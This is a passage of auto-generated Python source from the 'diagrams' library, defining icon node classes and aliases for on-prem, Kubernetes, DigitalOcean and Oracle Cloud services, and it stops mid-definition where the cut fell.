from . import _OnPrem class _Logging(_OnPrem): _type = "logging" _icon_dir = "resources/onprem/logging" class Fluentbit(_Logging): _icon = "fluentbit.png" class Graylog(_Logging): _icon = "graylog.png" class Loki(_Logging): _icon = "loki.png" class Rsyslog(_Logging): _icon = "rsyslog.png" class SyslogNg(_Logging): _icon = "syslog-ng.png" # Aliases FluentBit = Fluentbit RSyslog = Rsyslog File: diagrams/onprem/tracing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Tracing(_OnPrem): _type = "tracing" _icon_dir = "resources/onprem/tracing" class Jaeger(_Tracing): _icon = "jaeger.png" class Tempo(_Tracing): _icon = "tempo.png" # Aliases File: diagrams/onprem/dns.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Dns(_OnPrem): _type = "dns" _icon_dir = "resources/onprem/dns" class Coredns(_Dns): _icon = "coredns.png" class Powerdns(_Dns): _icon = "powerdns.png" # Aliases File: diagrams/onprem/gitops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Gitops(_OnPrem): _type = "gitops" _icon_dir = "resources/onprem/gitops" class Argocd(_Gitops): _icon = "argocd.png" class Flagger(_Gitops): _icon = "flagger.png" class Flux(_Gitops): _icon = "flux.png" # Aliases ArgoCD = Argocd File: diagrams/onprem/aggregator.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Aggregator(_OnPrem): _type = "aggregator" _icon_dir = "resources/onprem/aggregator" class Fluentd(_Aggregator): _icon = "fluentd.png" class Vector(_Aggregator): _icon = "vector.png" # Aliases File: diagrams/onprem/registry.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Registry(_OnPrem): _type = "registry" _icon_dir = "resources/onprem/registry" class Harbor(_Registry): _icon = "harbor.png" class Jfrog(_Registry): _icon = "jfrog.png" # Aliases File: diagrams/onprem/ci.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OnPrem class _Ci(_OnPrem): _type = "ci" _icon_dir = "resources/onprem/ci" class Circleci(_Ci): _icon = "circleci.png" class Concourseci(_Ci): _icon = "concourseci.png" class Droneci(_Ci): _icon = "droneci.png" class GithubActions(_Ci): _icon = "github-actions.png" class Gitlabci(_Ci): _icon = "gitlabci.png" class Jenkins(_Ci): _icon = "jenkins.png" class Teamcity(_Ci): _icon = "teamcity.png" class Travisci(_Ci): _icon = "travisci.png" class Zuulci(_Ci): _icon = "zuulci.png" # Aliases CircleCI = Circleci ConcourseCI = Concourseci DroneCI = Droneci GitlabCI = Gitlabci TravisCI = Travisci TC = Teamcity ZuulCI = Zuulci File: diagrams/onprem/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Monitoring(_OnPrem): _type = "monitoring" _icon_dir = "resources/onprem/monitoring" class Cortex(_Monitoring): _icon = "cortex.png" class Datadog(_Monitoring): _icon = "datadog.png" class Dynatrace(_Monitoring): _icon = "dynatrace.png" class Grafana(_Monitoring): _icon = "grafana.png" class Humio(_Monitoring): _icon = "humio.png" class Mimir(_Monitoring): _icon = "mimir.png" class Nagios(_Monitoring): _icon = "nagios.png" class Newrelic(_Monitoring): _icon = "newrelic.png" class PrometheusOperator(_Monitoring): _icon = "prometheus-operator.png" class Prometheus(_Monitoring): _icon = "prometheus.png" class Sentry(_Monitoring): _icon = "sentry.png" class Splunk(_Monitoring): _icon = "splunk.png" class Thanos(_Monitoring): _icon = "thanos.png" class Zabbix(_Monitoring): _icon = "zabbix.png" # Aliases File: diagrams/onprem/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Database(_OnPrem): _type = "database" _icon_dir = "resources/onprem/database" class Cassandra(_Database): _icon = "cassandra.png" class Clickhouse(_Database): _icon = "clickhouse.png" class Cockroachdb(_Database): _icon = "cockroachdb.png" class Couchbase(_Database): _icon = "couchbase.png" class Couchdb(_Database): _icon = "couchdb.png" class Dgraph(_Database): _icon = "dgraph.png" class Druid(_Database): _icon = "druid.png" class Hbase(_Database): _icon = "hbase.png" class Influxdb(_Database): _icon = "influxdb.png" class Janusgraph(_Database): _icon = "janusgraph.png" class Mariadb(_Database): _icon = "mariadb.png" class Mongodb(_Database): _icon = "mongodb.png" class Mssql(_Database): _icon = "mssql.png" class Mysql(_Database): _icon = "mysql.png" class Neo4J(_Database): _icon = "neo4j.png" class Oracle(_Database): _icon = "oracle.png" class Postgresql(_Database): _icon = "postgresql.png" class Scylla(_Database): _icon = "scylla.png" # Aliases ClickHouse = Clickhouse CockroachDB = Cockroachdb CouchDB = Couchdb HBase = Hbase InfluxDB = Influxdb JanusGraph = Janusgraph MariaDB = Mariadb MongoDB = Mongodb MSSQL = Mssql MySQL = Mysql PostgreSQL = Postgresql File: diagrams/onprem/client.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Client(_OnPrem): _type = "client" _icon_dir = "resources/onprem/client" class Client(_Client): _icon = "client.png" class User(_Client): _icon = "user.png" class Users(_Client): _icon = "users.png" # Aliases File: diagrams/onprem/mlops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
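# --- Illustrative sketch: on-prem CI, monitoring and database nodes above,
# assuming `diagrams.Diagram` and the `>>` operator; labels are hypothetical.
from diagrams import Diagram
from diagrams.onprem.ci import Jenkins
from diagrams.onprem.database import PostgreSQL
from diagrams.onprem.monitoring import Grafana, Prometheus

with Diagram("onprem_ci_observability_sketch", show=False):
    Jenkins("ci") >> PostgreSQL("build metadata")
    Prometheus("metrics") >> Grafana("dashboards")
# --- end sketch ---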
import _OnPrem class _Mlops(_OnPrem): _type = "mlops" _icon_dir = "resources/onprem/mlops" class Mlflow(_Mlops): _icon = "mlflow.png" class Polyaxon(_Mlops): _icon = "polyaxon.png" # Aliases File: diagrams/onprem/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Security(_OnPrem): _type = "security" _icon_dir = "resources/onprem/security" class Bitwarden(_Security): _icon = "bitwarden.png" class Trivy(_Security): _icon = "trivy.png" class Vault(_Security): _icon = "vault.png" # Aliases File: diagrams/onprem/iac.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Iac(_OnPrem): _type = "iac" _icon_dir = "resources/onprem/iac" class Ansible(_Iac): _icon = "ansible.png" class Atlantis(_Iac): _icon = "atlantis.png" class Awx(_Iac): _icon = "awx.png" class Puppet(_Iac): _icon = "puppet.png" class Terraform(_Iac): _icon = "terraform.png" # Aliases File: diagrams/onprem/__init__.py """ OnPrem provides a set of general on-premise services. """ from diagrams import Node class _OnPrem(Node): _provider = "onprem" _icon_dir = "resources/onprem" fontcolor = "#ffffff" File: diagrams/onprem/certificates.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Certificates(_OnPrem): _type = "certificates" _icon_dir = "resources/onprem/certificates" class CertManager(_Certificates): _icon = "cert-manager.png" class LetsEncrypt(_Certificates): _icon = "lets-encrypt.png" # Aliases File: diagrams/onprem/inmemory.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Inmemory(_OnPrem): _type = "inmemory" _icon_dir = "resources/onprem/inmemory" class Aerospike(_Inmemory): _icon = "aerospike.png" class Hazelcast(_Inmemory): _icon = "hazelcast.png" class Memcached(_Inmemory): _icon = "memcached.png" class Redis(_Inmemory): _icon = "redis.png" # Aliases File: diagrams/onprem/container.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Container(_OnPrem): _type = "container" _icon_dir = "resources/onprem/container" class Containerd(_Container): _icon = "containerd.png" class Crio(_Container): _icon = "crio.png" class Docker(_Container): _icon = "docker.png" class Firecracker(_Container): _icon = "firecracker.png" class Gvisor(_Container): _icon = "gvisor.png" class K3S(_Container): _icon = "k3s.png" class Lxc(_Container): _icon = "lxc.png" class Rkt(_Container): _icon = "rkt.png" # Aliases LXC = Lxc RKT = Rkt File: diagrams/onprem/proxmox.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Proxmox(_OnPrem): _type = "proxmox" _icon_dir = "resources/onprem/proxmox" class Pve(_Proxmox): _icon = "pve.png" # Aliases ProxmoxVE = Pve File: diagrams/onprem/vcs.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Vcs(_OnPrem): _type = "vcs" _icon_dir = "resources/onprem/vcs" class Git(_Vcs): _icon = "git.png" class Gitea(_Vcs): _icon = "gitea.png" class Github(_Vcs): _icon = "github.png" class Gitlab(_Vcs): _icon = "gitlab.png" class Svn(_Vcs): _icon = "svn.png" # Aliases File: diagrams/onprem/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
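# --- Illustrative sketch: on-prem VCS, IaC, secrets and container nodes above;
# assumes the top-level `diagrams.Diagram` API, labels are invented.
from diagrams import Diagram
from diagrams.onprem.container import Docker
from diagrams.onprem.iac import Ansible, Terraform
from diagrams.onprem.security import Vault
from diagrams.onprem.vcs import Github

with Diagram("onprem_delivery_sketch", show=False):
    repo = Github("infra repo")
    ansible = Ansible("configure")
    repo >> Terraform("provision")
    repo >> ansible >> Docker("docker host")
    Vault("secrets") >> ansible
# --- end sketch ---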
import _OnPrem class _Storage(_OnPrem): _type = "storage" _icon_dir = "resources/onprem/storage" class CephOsd(_Storage): _icon = "ceph-osd.png" class Ceph(_Storage): _icon = "ceph.png" class Glusterfs(_Storage): _icon = "glusterfs.png" class Portworx(_Storage): _icon = "portworx.png" # Aliases CEPH = Ceph CEPH_OSD = CephOsd File: diagrams/onprem/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Network(_OnPrem): _type = "network" _icon_dir = "resources/onprem/network" class Ambassador(_Network): _icon = "ambassador.png" class Apache(_Network): _icon = "apache.png" class Bind9(_Network): _icon = "bind-9.png" class Caddy(_Network): _icon = "caddy.png" class Consul(_Network): _icon = "consul.png" class Envoy(_Network): _icon = "envoy.png" class Etcd(_Network): _icon = "etcd.png" class Glassfish(_Network): _icon = "glassfish.png" class Gunicorn(_Network): _icon = "gunicorn.png" class Haproxy(_Network): _icon = "haproxy.png" class Internet(_Network): _icon = "internet.png" class Istio(_Network): _icon = "istio.png" class Jbossas(_Network): _icon = "jbossas.png" class Jetty(_Network): _icon = "jetty.png" class Kong(_Network): _icon = "kong.png" class Linkerd(_Network): _icon = "linkerd.png" class Nginx(_Network): _icon = "nginx.png" class Ocelot(_Network): _icon = "ocelot.png" class OpenServiceMesh(_Network): _icon = "open-service-mesh.png" class Opnsense(_Network): _icon = "opnsense.png" class Pfsense(_Network): _icon = "pfsense.png" class Pomerium(_Network): _icon = "pomerium.png" class Powerdns(_Network): _icon = "powerdns.png" class Tomcat(_Network): _icon = "tomcat.png" class Traefik(_Network): _icon = "traefik.png" class Tyk(_Network): _icon = "tyk.png" class Vyos(_Network): _icon = "vyos.png" class Wildfly(_Network): _icon = "wildfly.png" class Yarp(_Network): _icon = "yarp.png" class Zookeeper(_Network): _icon = "zookeeper.png" # Aliases ETCD = Etcd HAProxy = Haproxy OSM = OpenServiceMesh OPNSense = Opnsense PFSense = Pfsense VyOS = Vyos File: diagrams/onprem/search.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Search(_OnPrem): _type = "search" _icon_dir = "resources/onprem/search" class Solr(_Search): _icon = "solr.png" # Aliases File: diagrams/onprem/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Analytics(_OnPrem): _type = "analytics" _icon_dir = "resources/onprem/analytics" class Beam(_Analytics): _icon = "beam.png" class Databricks(_Analytics): _icon = "databricks.png" class Dbt(_Analytics): _icon = "dbt.png" class Dremio(_Analytics): _icon = "dremio.png" class Flink(_Analytics): _icon = "flink.png" class Hadoop(_Analytics): _icon = "hadoop.png" class Hive(_Analytics): _icon = "hive.png" class Metabase(_Analytics): _icon = "metabase.png" class Norikra(_Analytics): _icon = "norikra.png" class Powerbi(_Analytics): _icon = "powerbi.png" class Presto(_Analytics): _icon = "presto.png" class Singer(_Analytics): _icon = "singer.png" class Spark(_Analytics): _icon = "spark.png" class Storm(_Analytics): _icon = "storm.png" class Superset(_Analytics): _icon = "superset.png" class Tableau(_Analytics): _icon = "tableau.png" class Trino(_Analytics): _icon = "trino.png" # Aliases PowerBI = Powerbi File: diagrams/onprem/groupware.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
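# --- Illustrative sketch: the on-prem network nodes defined above, assuming
# `diagrams.Diagram`; labels are hypothetical.
from diagrams import Diagram
from diagrams.onprem.network import Gunicorn, HAProxy, Internet, Nginx

with Diagram("onprem_web_sketch", show=False):
    # Inbound traffic through a load balancer to the web and app tiers
    Internet("inbound") >> HAProxy("load balancer") >> Nginx("web") >> Gunicorn("app")
# --- end sketch ---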
import _OnPrem class _Groupware(_OnPrem): _type = "groupware" _icon_dir = "resources/onprem/groupware" class Nextcloud(_Groupware): _icon = "nextcloud.png" # Aliases File: diagrams/onprem/workflow.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Workflow(_OnPrem): _type = "workflow" _icon_dir = "resources/onprem/workflow" class Airflow(_Workflow): _icon = "airflow.png" class Digdag(_Workflow): _icon = "digdag.png" class Kubeflow(_Workflow): _icon = "kubeflow.png" class Nifi(_Workflow): _icon = "nifi.png" # Aliases KubeFlow = Kubeflow NiFi = Nifi File: diagrams/onprem/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Identity(_OnPrem): _type = "identity" _icon_dir = "resources/onprem/identity" class Dex(_Identity): _icon = "dex.png" # Aliases File: diagrams/onprem/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Compute(_OnPrem): _type = "compute" _icon_dir = "resources/onprem/compute" class Nomad(_Compute): _icon = "nomad.png" class Server(_Compute): _icon = "server.png" # Aliases File: diagrams/onprem/messaging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Messaging(_OnPrem): _type = "messaging" _icon_dir = "resources/onprem/messaging" class Centrifugo(_Messaging): _icon = "centrifugo.png" # Aliases File: diagrams/onprem/cd.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Cd(_OnPrem): _type = "cd" _icon_dir = "resources/onprem/cd" class Spinnaker(_Cd): _icon = "spinnaker.png" class TektonCli(_Cd): _icon = "tekton-cli.png" class Tekton(_Cd): _icon = "tekton.png" # Aliases File: diagrams/k8s/controlplane.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Controlplane(_K8S): _type = "controlplane" _icon_dir = "resources/k8s/controlplane" class API(_Controlplane): _icon = "api.png" class CCM(_Controlplane): _icon = "c-c-m.png" class CM(_Controlplane): _icon = "c-m.png" class KProxy(_Controlplane): _icon = "k-proxy.png" class Kubelet(_Controlplane): _icon = "kubelet.png" class Sched(_Controlplane): _icon = "sched.png" # Aliases APIServer = API ControllerManager = CM KubeProxy = KProxy Scheduler = Sched File: diagrams/k8s/clusterconfig.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Clusterconfig(_K8S): _type = "clusterconfig" _icon_dir = "resources/k8s/clusterconfig" class HPA(_Clusterconfig): _icon = "hpa.png" class Limits(_Clusterconfig): _icon = "limits.png" class Quota(_Clusterconfig): _icon = "quota.png" # Aliases LimitRange = Limits HorizontalPodAutoscaler = HPA File: diagrams/k8s/chaos.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Chaos(_K8S): _type = "chaos" _icon_dir = "resources/k8s/chaos" class ChaosMesh(_Chaos): _icon = "chaos-mesh.png" class LitmusChaos(_Chaos): _icon = "litmus-chaos.png" # Aliases File: diagrams/k8s/rbac.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _K8S

class _Rbac(_K8S):
    _type = "rbac"
    _icon_dir = "resources/k8s/rbac"

class CRole(_Rbac): _icon = "c-role.png"
class CRB(_Rbac): _icon = "crb.png"
class Group(_Rbac): _icon = "group.png"
class RB(_Rbac): _icon = "rb.png"
class Role(_Rbac): _icon = "role.png"
class SA(_Rbac): _icon = "sa.png"
class User(_Rbac): _icon = "user.png"

# Aliases
ClusterRole = CRole
ClusterRoleBinding = CRB
RoleBinding = RB
ServiceAccount = SA

File: diagrams/k8s/__init__.py

"""
K8S provides a set of services for Kubernetes.
"""

from diagrams import Node

class _K8S(Node):
    _provider = "k8s"
    _icon_dir = "resources/k8s"
    fontcolor = "#2d3436"

File: diagrams/k8s/podconfig.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S

class _Podconfig(_K8S):
    _type = "podconfig"
    _icon_dir = "resources/k8s/podconfig"

class CM(_Podconfig): _icon = "cm.png"
class Secret(_Podconfig): _icon = "secret.png"

# Aliases
ConfigMap = CM

File: diagrams/k8s/storage.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S

class _Storage(_K8S):
    _type = "storage"
    _icon_dir = "resources/k8s/storage"

class PV(_Storage): _icon = "pv.png"
class PVC(_Storage): _icon = "pvc.png"
class SC(_Storage): _icon = "sc.png"
class Vol(_Storage): _icon = "vol.png"

# Aliases
PersistentVolume = PV
PersistentVolumeClaim = PVC
StorageClass = SC
Volume = Vol

File: diagrams/k8s/network.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S

class _Network(_K8S):
    _type = "network"
    _icon_dir = "resources/k8s/network"

class Ep(_Network): _icon = "ep.png"
class Ing(_Network): _icon = "ing.png"
class Netpol(_Network): _icon = "netpol.png"
class SVC(_Network): _icon = "svc.png"

# Aliases
Endpoint = Ep
Ingress = Ing
NetworkPolicy = Netpol
Service = SVC

File: diagrams/k8s/group.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S

class _Group(_K8S):
    _type = "group"
    _icon_dir = "resources/k8s/group"

class NS(_Group): _icon = "ns.png"

# Aliases
Namespace = NS

File: diagrams/k8s/infra.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S

class _Infra(_K8S):
    _type = "infra"
    _icon_dir = "resources/k8s/infra"

class ETCD(_Infra): _icon = "etcd.png"
class Master(_Infra): _icon = "master.png"
class Node(_Infra): _icon = "node.png"

# Aliases

File: diagrams/k8s/others.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S

class _Others(_K8S):
    _type = "others"
    _icon_dir = "resources/k8s/others"

class CRD(_Others): _icon = "crd.png"
class PSP(_Others): _icon = "psp.png"

# Aliases

File: diagrams/k8s/ecosystem.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S

class _Ecosystem(_K8S):
    _type = "ecosystem"
    _icon_dir = "resources/k8s/ecosystem"

class ExternalDns(_Ecosystem): _icon = "external-dns.png"
class Helm(_Ecosystem): _icon = "helm.png"
class Krew(_Ecosystem): _icon = "krew.png"
class Kustomize(_Ecosystem): _icon = "kustomize.png"

# Aliases

File: diagrams/k8s/compute.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.
from .
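# --- Illustrative sketch: the Kubernetes aliases defined above (Ingress,
# Service, PVC, PV, StorageClass), assuming `diagrams.Diagram` and
# `diagrams.Cluster`; names and labels are invented.
from diagrams import Cluster, Diagram
from diagrams.k8s.network import Ingress, Service
from diagrams.k8s.storage import PV, PVC, StorageClass

with Diagram("k8s_sketch", show=False):
    with Cluster("cluster"):
        Ingress("ingress") >> Service("service")
        PVC("claim") >> PV("volume") >> StorageClass("standard")
# --- end sketch ---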
import _K8S class _Compute(_K8S): _type = "compute" _icon_dir = "resources/k8s/compute" class Cronjob(_Compute): _icon = "cronjob.png" class Deploy(_Compute): _icon = "deploy.png" class DS(_Compute): _icon = "ds.png" class Job(_Compute): _icon = "job.png" class Pod(_Compute): _icon = "pod.png" class RS(_Compute): _icon = "rs.png" class STS(_Compute): _icon = "sts.png" # Aliases Deployment = Deploy DaemonSet = DS ReplicaSet = RS StatefulSet = STS File: diagrams/digitalocean/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Database(_DigitalOcean): _type = "database" _icon_dir = "resources/digitalocean/database" class DbaasPrimaryStandbyMore(_Database): _icon = "dbaas-primary-standby-more.png" class DbaasPrimary(_Database): _icon = "dbaas-primary.png" class DbaasReadOnly(_Database): _icon = "dbaas-read-only.png" class DbaasStandby(_Database): _icon = "dbaas-standby.png" # Aliases File: diagrams/digitalocean/__init__.py """ DigitalOcean provides a set of services for DigitalOcean provider. """ from diagrams import Node class _DigitalOcean(Node): _provider = "digitalocean" _icon_dir = "resources/digitalocean" fontcolor = "#ffffff" File: diagrams/digitalocean/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Storage(_DigitalOcean): _type = "storage" _icon_dir = "resources/digitalocean/storage" class Folder(_Storage): _icon = "folder.png" class Space(_Storage): _icon = "space.png" class VolumeSnapshot(_Storage): _icon = "volume-snapshot.png" class Volume(_Storage): _icon = "volume.png" # Aliases File: diagrams/digitalocean/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Network(_DigitalOcean): _type = "network" _icon_dir = "resources/digitalocean/network" class Certificate(_Network): _icon = "certificate.png" class DomainRegistration(_Network): _icon = "domain-registration.png" class Domain(_Network): _icon = "domain.png" class Firewall(_Network): _icon = "firewall.png" class FloatingIp(_Network): _icon = "floating-ip.png" class InternetGateway(_Network): _icon = "internet-gateway.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class ManagedVpn(_Network): _icon = "managed-vpn.png" class Vpc(_Network): _icon = "vpc.png" # Aliases File: diagrams/digitalocean/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _DigitalOcean class _Compute(_DigitalOcean): _type = "compute" _icon_dir = "resources/digitalocean/compute" class Containers(_Compute): _icon = "containers.png" class Docker(_Compute): _icon = "docker.png" class DropletConnect(_Compute): _icon = "droplet-connect.png" class DropletSnapshot(_Compute): _icon = "droplet-snapshot.png" class Droplet(_Compute): _icon = "droplet.png" class K8SCluster(_Compute): _icon = "k8s-cluster.png" class K8SNodePool(_Compute): _icon = "k8s-node-pool.png" class K8SNode(_Compute): _icon = "k8s-node.png" # Aliases File: diagrams/oci/connectivity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
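# --- Illustrative sketch: the DigitalOcean nodes above, assuming the usual
# `diagrams.Diagram` context manager; labels are made up.
from diagrams import Diagram
from diagrams.digitalocean.compute import Droplet
from diagrams.digitalocean.database import DbaasPrimary
from diagrams.digitalocean.network import LoadBalancer

with Diagram("digitalocean_sketch", show=False):
    LoadBalancer("lb") >> Droplet("app server") >> DbaasPrimary("managed db")
# --- end sketch ---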
import _OCI class _Connectivity(_OCI): _type = "connectivity" _icon_dir = "resources/oci/connectivity" class BackboneWhite(_Connectivity): _icon = "backbone-white.png" class Backbone(_Connectivity): _icon = "backbone.png" class CDNWhite(_Connectivity): _icon = "cdn-white.png" class CDN(_Connectivity): _icon = "cdn.png" class CustomerDatacenter(_Connectivity): _icon = "customer-datacenter.png" class CustomerDatacntrWhite(_Connectivity): _icon = "customer-datacntr-white.png" class CustomerPremiseWhite(_Connectivity): _icon = "customer-premise-white.png" class CustomerPremise(_Connectivity): _icon = "customer-premise.png" class DisconnectedRegionsWhite(_Connectivity): _icon = "disconnected-regions-white.png" class DisconnectedRegions(_Connectivity): _icon = "disconnected-regions.png" class DNSWhite(_Connectivity): _icon = "dns-white.png" class DNS(_Connectivity): _icon = "dns.png" class FastConnectWhite(_Connectivity): _icon = "fast-connect-white.png" class FastConnect(_Connectivity): _icon = "fast-connect.png" class NATGatewayWhite(_Connectivity): _icon = "nat-gateway-white.png" class NATGateway(_Connectivity): _icon = "nat-gateway.png" class VPNWhite(_Connectivity): _icon = "vpn-white.png" class VPN(_Connectivity): _icon = "vpn.png" # Aliases File: diagrams/oci/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Monitoring(_OCI): _type = "monitoring" _icon_dir = "resources/oci/monitoring" class AlarmWhite(_Monitoring): _icon = "alarm-white.png" class Alarm(_Monitoring): _icon = "alarm.png" class EmailWhite(_Monitoring): _icon = "email-white.png" class Email(_Monitoring): _icon = "email.png" class EventsWhite(_Monitoring): _icon = "events-white.png" class Events(_Monitoring): _icon = "events.png" class HealthCheckWhite(_Monitoring): _icon = "health-check-white.png" class HealthCheck(_Monitoring): _icon = "health-check.png" class NotificationsWhite(_Monitoring): _icon = "notifications-white.png" class Notifications(_Monitoring): _icon = "notifications.png" class QueueWhite(_Monitoring): _icon = "queue-white.png" class Queue(_Monitoring): _icon = "queue.png" class SearchWhite(_Monitoring): _icon = "search-white.png" class Search(_Monitoring): _icon = "search.png" class TelemetryWhite(_Monitoring): _icon = "telemetry-white.png" class Telemetry(_Monitoring): _icon = "telemetry.png" class WorkflowWhite(_Monitoring): _icon = "workflow-white.png" class Workflow(_Monitoring): _icon = "workflow.png" # Aliases File: diagrams/oci/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OCI class _Database(_OCI): _type = "database" _icon_dir = "resources/oci/database" class AutonomousWhite(_Database): _icon = "autonomous-white.png" class Autonomous(_Database): _icon = "autonomous.png" class BigdataServiceWhite(_Database): _icon = "bigdata-service-white.png" class BigdataService(_Database): _icon = "bigdata-service.png" class DatabaseServiceWhite(_Database): _icon = "database-service-white.png" class DatabaseService(_Database): _icon = "database-service.png" class DataflowApacheWhite(_Database): _icon = "dataflow-apache-white.png" class DataflowApache(_Database): _icon = "dataflow-apache.png" class DcatWhite(_Database): _icon = "dcat-white.png" class Dcat(_Database): _icon = "dcat.png" class DisWhite(_Database): _icon = "dis-white.png" class Dis(_Database): _icon = "dis.png" class DMSWhite(_Database): _icon = "dms-white.png" class DMS(_Database): _icon = "dms.png" class ScienceWhite(_Database): _icon = "science-white.png" class Science(_Database): _icon = "science.png" class StreamWhite(_Database): _icon = "stream-white.png" class Stream(_Database): _icon = "stream.png" # Aliases ADB = Autonomous ADBWhite = AutonomousWhite DBService = DatabaseService DBServiceWhite = DatabaseServiceWhite File: diagrams/oci/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Security(_OCI): _type = "security" _icon_dir = "resources/oci/security" class CloudGuardWhite(_Security): _icon = "cloud-guard-white.png" class CloudGuard(_Security): _icon = "cloud-guard.png" class DDOSWhite(_Security): _icon = "ddos-white.png" class DDOS(_Security): _icon = "ddos.png" class EncryptionWhite(_Security): _icon = "encryption-white.png" class Encryption(_Security): _icon = "encryption.png" class IDAccessWhite(_Security): _icon = "id-access-white.png" class IDAccess(_Security): _icon = "id-access.png" class KeyManagementWhite(_Security): _icon = "key-management-white.png" class KeyManagement(_Security): _icon = "key-management.png" class MaxSecurityZoneWhite(_Security): _icon = "max-security-zone-white.png" class MaxSecurityZone(_Security): _icon = "max-security-zone.png" class VaultWhite(_Security): _icon = "vault-white.png" class Vault(_Security): _icon = "vault.png" class WAFWhite(_Security): _icon = "waf-white.png" class WAF(_Security): _icon = "waf.png" # Aliases File: diagrams/oci/__init__.py """ OCI provides a set of services for Oracle Cloud Infrastructure provider. """ from diagrams import Node class _OCI(Node): _provider = "oci" _icon_dir = "resources/oci" fontcolor = "#312D2A" File: diagrams/oci/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Devops(_OCI): _type = "devops" _icon_dir = "resources/oci/devops" class APIGatewayWhite(_Devops): _icon = "api-gateway-white.png" class APIGateway(_Devops): _icon = "api-gateway.png" class APIServiceWhite(_Devops): _icon = "api-service-white.png" class APIService(_Devops): _icon = "api-service.png" class ResourceMgmtWhite(_Devops): _icon = "resource-mgmt-white.png" class ResourceMgmt(_Devops): _icon = "resource-mgmt.png" # Aliases File: diagrams/oci/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
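# --- Illustrative sketch: OCI devops, database and security nodes above,
# assuming `diagrams.Diagram`; labels are hypothetical.
from diagrams import Diagram
from diagrams.oci.database import ADB
from diagrams.oci.devops import APIGateway
from diagrams.oci.security import Vault

with Diagram("oci_sketch", show=False):
    api = APIGateway("api gateway")
    Vault("vault") >> api
    api >> ADB("autonomous db")
# --- end sketch ---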
import _OCI class _Storage(_OCI): _type = "storage" _icon_dir = "resources/oci/storage" class BackupRestoreWhite(_Storage): _icon = "backup-restore-white.png" class BackupRestore(_Storage): _icon = "backup-restore.png" class BlockStorageCloneWhite(_Storage): _icon = "block-storage-clone-white.png" class BlockStorageClone(_Storage): _icon = "block-storage-clone.png" class BlockStorageWhite(_Storage): _icon = "block-storage-white.png" class BlockStorage(_Storage): _icon = "block-storage.png" class BucketsWhite(_Storage): _icon = "buckets-white.png" class Buckets(_Storage): _icon = "buckets.png" class DataTransferWhite(_Storage): _icon = "data-transfer-white.png" class DataTransfer(_Storage): _icon = "data-transfer.png" class ElasticPerformanceWhite(_Storage): _icon = "elastic-performance-white.png" class ElasticPerformance(_Storage): _icon = "elastic-performance.png" class FileStorageWhite(_Storage): _icon = "file-storage-white.png" class FileStorage(_Storage): _icon = "file-storage.png" class ObjectStorageWhite(_Storage): _icon = "object-storage-white.png" class ObjectStorage(_Storage): _icon = "object-storage.png" class StorageGatewayWhite(_Storage): _icon = "storage-gateway-white.png" class StorageGateway(_Storage): _icon = "storage-gateway.png" # Aliases File: diagrams/oci/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Network(_OCI): _type = "network" _icon_dir = "resources/oci/network" class DrgWhite(_Network): _icon = "drg-white.png" class Drg(_Network): _icon = "drg.png" class FirewallWhite(_Network): _icon = "firewall-white.png" class Firewall(_Network): _icon = "firewall.png" class 